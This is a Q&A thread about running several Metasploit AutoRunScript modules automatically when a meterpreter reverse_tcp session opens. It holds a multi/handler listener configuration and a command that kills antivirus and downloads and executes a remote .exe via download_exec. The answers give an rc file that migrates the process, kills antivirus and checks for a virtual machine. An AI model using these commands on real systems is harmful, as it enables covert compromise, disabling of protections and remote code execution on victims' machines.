# How to set autorunscript multiple commands?

Tags: metasploit

```
set AutoRunScript "post/windows/manage/killav","post/windows/manage/download_exec EXECUTE=true OUTPUT=false URL=http://google.com/so.exe"
```

does not work

How to start AutoRunScript multiple commands in a metasploit session?

With one instruction it works

```
use exploit/multi/handler 
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST localhost
set LPORT 4445
set AutoRunScript post/windows/manage/killav
exploit -j
```

Answer (score 1):

[The first google hit](https://offensiveinfosec.wordpress.com/tag/autorunscript/) explains that perfectly:

> ```
> msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
> ```
>
> Inside of the rc file just list the commands one by one like so:
>
> ```
> run post/windows/manage/migrate
>
> run post/windows/manage/killav
>
> run post/windows/gather/checkvm
> ```
>
> Now save the file autoruncommands.rc inside of the root folder.

I can not see what to add to this any further.

Comment: This command does not work, I tried it

Comment: Then what did you try and what was the output when it failed?

Comment: `Session ID 1 (192.168.100.10:4444 ->192.168.100.25:60622) processing AutoRunScript 'multi_console_command -rc ~/user/autoruncommands.rc'`  that's it, after no action. I want to note that the AutoRunScript is launched in the session meterpterter reverse_tcp

Answer (score 0):

You just need to remove the -rc switch, its been depreciated and removed as part of the syntax.

All you need to specify would be:

> set AutoRunScript /root/autoruncommands.rc

Works for me.